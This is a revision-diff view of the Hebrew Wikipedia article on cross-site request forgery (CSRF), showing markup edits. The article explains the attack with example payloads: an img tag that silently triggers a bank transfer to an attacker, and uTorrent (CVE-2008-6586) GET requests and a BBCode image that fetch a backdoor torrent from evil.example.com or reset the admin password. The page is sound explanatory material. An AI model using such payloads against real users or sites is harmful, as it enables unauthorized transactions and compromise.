CSRF – הבדלי גרסאות

תוכן שנמחק תוכן שנוסף
מ תיקון nowiki
שורה 19:
"היי אליס! שמי בוב ואני רוצה להציע לך ביטוח רכב ל-3 חודשים ללא עלות לפרטים נוספים, לחצי על התמונה":
 
<syntaxhighlight>
<code><img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=attacker"=img src></code>
</syntaxhighlight>
 
אם הבנק של אליס שומר את אימות המשתמש ובמקרה שתוקף העוגייה לא פג, לאחר שאליס תלחץ על התמונה, הדפדפן שלה ישלח בקשה להעברת כסף לחשבון של בוב ויאמת זאת באמצעות אותה העוגייה, משמעות הדבר היא שהעסקה תושלם בהצלחה, למרות שכל זה קורה ללא אישור וידיעת אליס.
שורה 27 ⟵ 29:
 
פגיעות באתר הטורנטים הפופולרי uTorrent - יוטורנט (CVE-2008-6586) ניצלה את העובדה שהאתר נגיש ב-localhost:8080 ואיפשרה לבצע פעולות פשוטות בעזרת פעולות GET פשוטות:
;הורדת קובץ ללא הסכמת המשתמש :
<nowikisyntaxhighlight>http://localhost:8080/gui/?action=add-url&amp;s=http://evil.example.com/backdoor.torrent</nowikisyntaxhighlight>
;שינוי סיסמאת האדמין של uTorrent - יוטורנט :
<nowikisyntaxhighlight>http://localhost:8080/gui/?action=setsetting&amp;s=webui.password&amp;v=eviladmin</nowikisyntaxhighlight>
 
 
ניתן להשתמש גם בהזנה מיוחדת של קוד HTML הנקראת BBCode באופן הבא:
 
<syntaxhighlight>
<code>[Img]http://localhost:8080/gui/?Action=add-url&amp;shttp://evil.example.com/backdoor.torrent[/img]</code>
</syntaxhighlight>
 
במקרה של קשר בין יישום מקומי לבין קישור התקפי, הדפדפן ישלח באופן אוטומטי את כל קבצי העוגייה הקיימים של אותו היישום.